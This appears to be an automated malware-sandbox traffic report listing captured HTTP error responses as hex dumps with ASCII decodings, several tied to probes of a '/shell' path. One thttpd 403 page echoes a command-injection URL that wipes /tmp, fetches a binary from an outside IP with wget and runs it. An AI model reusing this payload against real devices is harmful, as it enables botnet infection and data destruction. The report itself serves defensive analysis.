Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:08:51 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Content-Type: text/html; charset=iso-8859-1Accept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:51 GMTServer: ApacheContent-Length: 255Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:09:54 GMTServer: webserverX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:51 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:23:54 GMTLast-Modified: Sat, 17 Oct 2015 00:23:54 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 01 Nov 2021 09:08:53 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:53 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:53 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETsvr: 05Date: Mon, 01 Nov 2021 09:08:53 GMTContent-Length: 1245Set-Cookie: CacheWeb=2270734528.20480.0000; path=/Vary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:08:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 